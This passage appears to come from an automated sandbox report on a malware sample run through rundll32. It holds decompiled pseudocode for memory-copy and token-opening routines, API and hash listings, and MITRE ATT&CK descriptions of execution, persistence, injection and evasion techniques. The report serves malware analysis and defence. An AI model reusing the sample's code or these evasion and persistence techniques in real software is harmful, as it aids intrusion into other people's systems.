						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x2c20206
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x9fe85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x48af445
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x20d88a1
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10017250(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x20d88a1
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8ac9b60f
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x9fe85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x9fe85000
							E100183B0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10017110( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x9fe85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10015396
0x1001539b
0x1001539f
0x100153a2
0x100153a2
0x100153a5
0x100153aa
0x100153af
0x100153b2
0x100153b7
0x100153ba
0x100153c0
0x100153c0
0x100153cb
0x100153ce
0x100153d5
0x100153da
0x00000000
0x00000000
0x100153e0
0x100153e5
0x100153e5
0x100153ea
0x100153f0
0x100153fa
0x100153ff
0x10015405
0x10015424
0x10015427
0x10015432
0x10015432
0x10015432
0x10015429
0x10015429
0x1001542b
0x00000000
0x1001542d
0x1001542d
0x1001542d
0x1001542b
0x1001543a
0x1001543f
0x10015444
0x1001544a
0x1001544e
0x10015451
0x10015454
0x1001545a
0x1001545f
0x10015462
0x10015468
0x1001546d
0x10015473
0x10015479
0x1001547e
0x10015481
0x10015486
0x1001548a
0x1001548e
0x10015491
0x10015494
0x1001549d
0x100154a4
0x100154a7
0x100154aa
0x100154af
0x100154b4
0x100154b7
0x100154ba
0x100154ba
0x100154be
0x100154c7
0x100154ce
0x100154d1
0x100154d6
0x100154db
0x100154db
0x100154de
0x100154e3
0x00000000
0x00000000
0x10015407
0x10015409
0x10015416
0x00000000
0x00000000
0x10015416
0x10015409
0x00000000
0x10015405
0x100154e9
0x100154ee
0x100154f1
0x100154f4
0x1001559f
0x1001559f
0x100154fa
0x100154fa
0x100154fa
0x100154ff
0x10015529
0x1001552c
0x1001552c
0x10015531
0x10015533
0x10015535
0x10015538
0x1001553b
0x10015543
0x10015548
0x10015548
0x1001554e
0x10015551
0x10015554
0x10015557
0x10015559
0x10015559
0x1001555a
0x1001555a
0x10015557
0x10015568
0x1001556b
0x1001556f
0x10015574
0x10015577
0x1001557a
0x1001557a
0x1001557a
0x1001557d
0x1001557d
0x10015580
0x10015580
0x10015501
0x10015501
0x10015511
0x10015514
0x10015519
0x10015519
0x1001551c
0x1001551f
0x10015522
0x10015524
0x10015524
0x10015583
0x10015585
0x10015588
0x10015588
0x1001558e
0x10015592
0x10015595
0x10015597
0x10015597
0x100155a8
0x100155aa
0x100155aa
0x100155b2
0x100155c0
0x100155c3
0x100155c5
0x100155e5
0x100155e5
0x100155e8
0x100155ee
0x100155ef
0x100155f2
0x100155f4
0x100155f7
0x100155fa
0x100155fd
0x10015601
0x10015604
0x10015607
0x1001560a
0x1001560c
0x1001560c
0x1001560f
0x10015611
0x10015611
0x10015614
0x10015616
0x10015619
0x10015621
0x10015624
0x10015629
0x10015629
0x1001562f
0x10015632
0x10015635
0x10015637
0x10015637
0x10015638
0x10015638
0x10015643
0x10015643
0x10015643
0x10015646
0x10015649
0x10015649
0x1001564c
0x1001564c
0x1001560f
0x1001564f
0x10015652
0x10015655
0x10015657
0x1001565a
0x1001565c
0x1001565f
0x10015662
0x10015664
0x10015667
0x1001566f
0x10015677
0x1001567a
0x1001567a
0x1001567a
0x1001567d
0x1001567d
0x1001567d
0x10015680
0x10015686
0x10015688
0x10015688
0x1001568e
0x10015694
0x1001569d
0x100156a4
0x100156a6
0x100156a9
0x100156a9
0x100156ac
0x100156ac
0x100156af
0x100156b1
0x100156b4
0x100156b6
0x100156d1
0x100156d1
0x100156d5
0x100156d8
0x100156db
0x100156de
0x100156f4
0x100156f4
0x100156f4
0x100156e0
0x100156e0
0x100156e2
0x100156e6
0x100156e9
0x00000000
0x100156eb
0x100156eb
0x100156ed
0x00000000
0x100156ef
0x100156ef
0x100156ef
0x100156ed
0x100156e9
0x100156f8
0x100156fb
0x10015700
0x1001570a
0x1001570a
0x1001570a
0x1001570d
0x100156b8
0x100156b8
0x100156ba
0x100156c1
0x100156c1
0x100156c3
0x100156c5
0x100156c7
0x100156cb
0x100156cd
0x100156cf
0x00000000
0x00000000
0x100156cf
0x100156cb
0x100156bc
0x100156bc
0x100156bf
0x00000000
0x00000000
0x100156bf
0x100156ba
0x10015717
0x10015719
0x10015719
0x10015724
0x100155c7
0x100155c7
0x100155ca
0x00000000
0x100155cc
0x100155cc
0x100155ce
0x100155d2
0x00000000
0x100155d4
0x100155d4
0x100155d4
0x100155d7
0x00000000
0x100155db
0x100155e4
0x100155e4
0x100155d7
0x100155d2
0x100155ca
0x100155b6
0x100155bf
0x100155bf

APIs

memcpy.MSVCRT ref: 1001549D
memcpy.MSVCRT ref: 10015514
memcpy.MSVCRT ref: 10015543
memcpy.MSVCRT ref: 1001556F
memcpy.MSVCRT ref: 10015624

Part of subcall function 100183B0: memcpy.MSVCRT ref: 1001848E

Part of subcall function 10017110: memcpy.MSVCRT ref: 1001713A

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
Instruction ID: c03aa8aa18d0fbe9ba0a8144e32312481850ad9e2bb41e7d7b69b8a2636fcd53
Opcode Fuzzy Hash: a15768640203d689b50e80daa63f56e2f1f27f81ff21523bef836df72f228821
Instruction Fuzzy Hash: 2CD11575A00A00DFC724CF69D8D495AB7E2FF88345B69892DE88ACB751D732F984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6936DF34 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

Scre_fullinfo.PUTTY ref: 6936DF57

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Scre_fullinfo
String ID:
API String ID: 3112101106-0
Opcode ID: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
Instruction ID: 2f0f8ac4a6c77a6249221e324dc37063bf8a5fa34516ddaf34cd33c7e9f385e3
Opcode Fuzzy Hash: c93dc1a74ea445240d4ae3283a74e48f723b520edb8a2083968d0829e9f80fb9
Instruction Fuzzy Hash: 7241C570904219DFCB40CFA9C9447AEBBF0BB48344F10895AE464EB3A4D379D954CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000E425 Relevance: 6.0, APIs: 4, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000E425(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x10020d58; // 0x4a1f900
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}

0x1000e444
0x1000e476
0x1000e476
0x1000e446
0x1000e451
0x1000e472
0x1000e472
0x1000e453
0x1000e45d
0x1000e470
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e470
0x1000e451
0x1000e47b

APIs

GetCurrentThread.KERNEL32 ref: 1000E438
OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: OpenThreadToken$CurrentErrorLastProcess
String ID:
API String ID: 1515895013-0
Opcode ID: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
Instruction ID: dc40be8b8696f4cd8aae3a846ac2de8cb0550173adfbeab254a65d27bd2c8ac9
Opcode Fuzzy Hash: 4bc0d986f6800a7c46793aa933587504edcea6ea4c041a35c67ee97f7d79fe03
Instruction Fuzzy Hash: F0F01771644656ABFB40DBE48C88B9A77ECFB48390F114450FA82E3061D760EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 6934B536 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448COMMON

Download Yara Rule

APIs

Spcre_ord2utf.PUTTY ref: 6934BA4E

Strings

", xrefs: 6934B9A9
9, xrefs: 6934B679

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Spcre_ord2utf
String ID: "$9
API String ID: 2386214801-1785012786
Opcode ID: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
Instruction ID: cac0eb53969d93db26724e6844d53edc3ff5712cee5a533c54c1469f8d48d3a8
Opcode Fuzzy Hash: 1c102efb01908e3025367ebddb724c30be7ac19a5bebe967fdb5c6f1c95b317a
Instruction Fuzzy Hash: B012E275A442698FDB60CF28C880B9DBBF1BB4A704F1241E6E858AB351D736DE85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 6934AB36 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

+, xrefs: 6934ACE3
), xrefs: 6934AB36

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID:
String ID: )$+
API String ID: 0-2508831899
Opcode ID: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
Instruction ID: dee43e2518805977d30bcdb0612ec7d7bd44b5426b8b48ecf227347456f986f0
Opcode Fuzzy Hash: 53bd7514d88783a3749d3b90285573761fe62f8689b182cb6d92a23f7fbe4037
Instruction Fuzzy Hash: 34C1E275A442698FCBA0CF19C880B99BBF1BB4A315F4640E5E8A8EB351D3359EC1DF11

Uniqueness

Uniqueness Score: -1.00%

Function 6935EA5C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Spcre_ord2utf.PUTTY ref: 6935ED2C

Strings

-, xrefs: 6935ECB9
-, xrefs: 6935EA6B

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Spcre_ord2utf
String ID: -$-
API String ID: 2386214801-2078519666
Opcode ID: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
Instruction ID: 3e5d8ca9498a0678a438d22df031d9ab7c365247f1d65f927effdcfebb4ea575
Opcode Fuzzy Hash: 9c27036320733e4638026f8ccc566485371b5ac00e94e430021dcdb9fcc3facd
Instruction Fuzzy Hash: 79519B71A04359DFCB20CFA9C484AADBBF1FB49315F14806AE869DB241D339DA95DF10

Uniqueness

Uniqueness Score: -1.00%

Function 69372650 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6937265E
TlsGetValue.KERNEL32 ref: 69372685
GetLastError.KERNEL32 ref: 6937268C
LeaveCriticalSection.KERNEL32 ref: 693726AC

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
Instruction ID: 455d058e190500b25c4036b5ce58305cdaa5a743c53bd03fa708557c2ea23cbd
Opcode Fuzzy Hash: 8852aac37c6fd83e67a81a8a7705b6a0a19c3db9ddd8cb4d70b2c930beee8ff0
Instruction Fuzzy Hash: 90F0A4B69043408BDF20BFB9D7C651A7BB8FA46700B050529DD944B204DA75A406CBA3

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

